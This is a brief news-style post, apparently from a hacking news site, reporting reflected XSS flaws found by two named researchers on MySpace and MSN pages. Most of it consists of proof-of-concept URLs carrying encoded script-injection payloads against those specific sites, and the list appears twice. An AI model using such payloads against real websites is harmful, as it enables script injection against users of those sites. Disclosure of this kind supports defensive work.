Ethical Hacker Vansh Sharma and his brother Vaibhuv Sharma discovered a Reflected XSS vulnerability in MSN and MySpace sites. Recently, he discovered XSS Vulnerability in ehackingnews and google apps sites.
Here is the proof:
MY SPACE - http://www.myspace.com/stillstandingthemovement/videos/extern.php?url=%22%3E%3CScript%3Ealert%28%22XSS%20by%20Vansh%20&%20Vaibhuv%22%29%3C/script%3E
MSN - http://muziek.downloaden.nl.msn.com/singles.php?cat=jazz%22%3E%3CScript%3Ealert%28/XSS/%29%3C/script%3E
Here is the proof:
MY SPACE - http://www.myspace.com/stillstandingthemovement/videos/extern.php?url=%22%3E%3CScript%3Ealert%28%22XSS%20by%20Vansh%20&%20Vaibhuv%22%29%3C/script%3E
MSN - http://muziek.downloaden.nl.msn.com/singles.php?cat=jazz%22%3E%3CScript%3Ealert%28/XSS/%29%3C/script%3E
XSS Vulnerability in MSN |
XSS vulnerability in MySpace |